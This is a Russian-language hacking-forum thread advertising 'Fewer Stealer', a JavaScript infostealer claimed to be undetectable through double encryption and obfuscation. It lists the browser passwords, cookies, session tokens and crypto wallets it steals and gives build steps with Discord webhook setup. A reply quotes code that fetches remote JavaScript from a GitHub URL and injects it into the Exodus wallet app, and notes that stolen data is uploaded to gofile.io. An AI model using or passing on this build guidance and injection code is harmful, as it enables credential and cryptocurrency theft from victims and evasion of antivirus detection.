Статья Fewer Stealer FUD

[Knew100]

Fewer Stealer сделан в JavaScript https://nodejs.org/ и на данный момент имеет FUD 0/66 или случайный детект. Всё благодаря двойному крипту.

️Автоматическая обфускация при построении
Сильно запутан
️Отправляет все файлы в Webhook Discord

Функции:​

• Chrome Edge Brave Opera OperaGX OperaNeon Yandex
• Passwords
• Cookies (Auto Cookie Parser)
• Discord Token
• Instagram Session Stealer & Validator
• Reddit Session stealer & validator
• Roblox Session Stealer & Validator
• TikTok Session Stealer & Validator
• Autofills: Автозаполнение
• Information
• Telegram Session stealer
• Wallets: Trust, Metamask, BinanceChain, Phantom, TronLink, Ronin, Exodus, Coin98, Authenticator, MathWallet, YoroiWallet, GuardaWallet, JaxxxLiberty, Wombat, EVERWallet, KardiaChain, XDEFI, Nami, TerraStation, MartianAptos, TON, Keplr, CryptoCom, PetraAptos, OKX, Sollet, Sender, Sui, SuietSui, Braavos, FewchaMove, EthosSui, ArgentX, NiftyWallet, BraveWallet, EqualWallet, BitAppWallet, iWallet, AtomicWallet, MewCx, GuildWallet, SaturnWallet, HarmonyWallet, PaliWallet, BoltX, LiqualityWallet, MaiarDeFiWallet, TempleWallet, Metamask_Edge, Ronin_Edge, Yoroi_Edge, Authenticator_Edge, MetaMask_Opera
• Exodus wallet injection
• FTP stealer (FileZilla)

Выполните следующие действия, чтобы настроить Fewer Stealer:​

### Шаг 1. Настройка Discord Webhook

1. Перейдите в папку "first crypter".
2. Откройте файл sa.js.
3. Найдите строку: `const webhook3939 = "YOUR_DISCORD_WEBHOOK_PUT_HERE";`
4. Замените YOUR_DISCORD_WEBHOOK_PUT_HERE на фактический URL webhook Discord.
5. Проверьте 1032. (`если у вас есть код иньекции, разместите ссылку здесь`)

### Шаг 2. Обновление Discord Webhook ID и токена

1. В файле sa.js найдите: `const webhook = "putyourdiscordwebhook idandtoken example 1140099498811592776/ESVhMa2_MNqmQcCGQZif3goeF5HNyk5ozbEgkmqkimIZMvIW1mcGRUSLyl48bwLKAMMX";`
2. Измените содержимое кавычек, чтобы оно соответствовало вашему Discord Webhook ID и token.

### Шаг 3: Добавление файла ICO

1. Зайдите в основную папку.
2. Скопируйте в эту папку визуально привлекательный файл ICO (256x256 пикселей).

### Шаг 4: Компиляция

1. Вернитесь в папку Fewer Stealer.
2. Запустите файл build.bat, чтобы начать процесс компиляции.
3. Прежде всего должны установить серверный JS https://nodejs.org/en/download/

В архиве только исходники, готовый exe уже прогружен в VT, лучше не повторяйте.

AES-256 и js-confuser в паре работают
Весь код открыт, если врубиться в писанину, можно докидать много чего

На джиес конфузерах слишком мало стилеров, все проверялки привкли к пайтону и шарпу. В списке нет самого главного файерфокс, не уж то сложно прописать путь. Есть же 6 путей к браузерам, а самый главный забыли.
Ничего сложного, создать и добавить такой же массив цифр с функциями, только для наиболее приоритетного браузера.

 

[blueoffice]

this is my exe file to work with ?

or where is the final output file i will work with ?

 

[kokoganev]

If you run the created exe on the pc you have build it - the Defender doesn't triggers but if you download the build from a server and try to run it the Defender cach it.

 

[Dark_TM]

Fewer Stealer сделан в JavaScript https://nodejs.org/ и на данный момент имеет FUD 0/66 или случайный детект. Всё благодаря двойному крипту.

️Автоматическая обфускация при построении
Сильно запутан
️Отправляет все файлы в Webhook Discord

Функции:​

• Chrome Edge Brave Opera OperaGX OperaNeon Yandex
• Passwords
• Cookies (Auto Cookie Parser)
• Discord Token
• Instagram Session Stealer & Validator
• Reddit Session stealer & validator
• Roblox Session Stealer & Validator
• TikTok Session Stealer & Validator
• Autofills: Автозаполнение
• Information
• Telegram Session stealer
• Wallets: Trust, Metamask, BinanceChain, Phantom, TronLink, Ronin, Exodus, Coin98, Authenticator, MathWallet, YoroiWallet, GuardaWallet, JaxxxLiberty, Wombat, EVERWallet, KardiaChain, XDEFI, Nami, TerraStation, MartianAptos, TON, Keplr, CryptoCom, PetraAptos, OKX, Sollet, Sender, Sui, SuietSui, Braavos, FewchaMove, EthosSui, ArgentX, NiftyWallet, BraveWallet, EqualWallet, BitAppWallet, iWallet, AtomicWallet, MewCx, GuildWallet, SaturnWallet, HarmonyWallet, PaliWallet, BoltX, LiqualityWallet, MaiarDeFiWallet, TempleWallet, Metamask_Edge, Ronin_Edge, Yoroi_Edge, Authenticator_Edge, MetaMask_Opera
• Exodus wallet injection
• FTP stealer (FileZilla)

Выполните следующие действия, чтобы настроить Fewer Stealer:​

### Шаг 1. Настройка Discord Webhook

1. Перейдите в папку "first crypter".
2. Откройте файл sa.js.
3. Найдите строку: `const webhook3939 = "YOUR_DISCORD_WEBHOOK_PUT_HERE";`
4. Замените YOUR_DISCORD_WEBHOOK_PUT_HERE на фактический URL webhook Discord.
5. Проверьте 1032. (`если у вас есть код иньекции, разместите ссылку здесь`)

### Шаг 2. Обновление Discord Webhook ID и токена

1. В файле sa.js найдите: `const webhook = "putyourdiscordwebhook idandtoken example 1140099498811592776/ESVhMa2_MNqmQcCGQZif3goeF5HNyk5ozbEgkmqkimIZMvIW1mcGRUSLyl48bwLKAMMX";`
2. Измените содержимое кавычек, чтобы оно соответствовало вашему Discord Webhook ID и token.

### Шаг 3: Добавление файла ICO

1. Зайдите в основную папку.
2. Скопируйте в эту папку визуально привлекательный файл ICO (256x256 пикселей).

### Шаг 4: Компиляция

1. Вернитесь в папку Fewer Stealer.
2. Запустите файл build.bat, чтобы начать процесс компиляции.
3. Прежде всего должны установить серверный JS https://nodejs.org/en/download/

В архиве только исходники, готовый exe уже прогружен в VT, лучше не повторяйте.

AES-256 и js-confuser в паре работают
Весь код открыт, если врубиться в писанину, можно докидать много чего

На джиес конфузерах слишком мало стилеров, все проверялки привкли к пайтону и шарпу. В списке нет самого главного файерфокс, не уж то сложно прописать путь. Есть же 6 путей к браузерам, а самый главный забыли.
Ничего сложного, создать и добавить такой же массив цифр с функциями, только для наиболее приоритетного браузера.

папка first cryptor файл sa.js

подгрузка js файла - https://raw.githubusercontent.com/xfixxygithubcdn/asar/main/index.js

const codeDownloadURL = 'https://raw.githubusercontent.com/xfixxygithubcdn/asar/main/index.js';

// Define the Discord webhook URL
const webhook = "putyourdiscordwebhook idandtoken example 1140099498811592776/ESVhMa2_MNqmQcCGQZif3goeF5HNyk5ozbEgkmqkimIZMvIW1mcGRUSLyl48bwLKAMMX";

// Call the extractAppAsarAndInject function with the correct parameters
extractAppAsarAndInject(localll, 'exodus.exe', codeDownloadURL, webhook);

у тебя тут написано что он отсылает все файлы в discord тогда почему почти по всему коду присутствует отправка zip на

https://api.gofile.io/uploadFile

не советую юзать софт который якобы сливает этот ебантяй))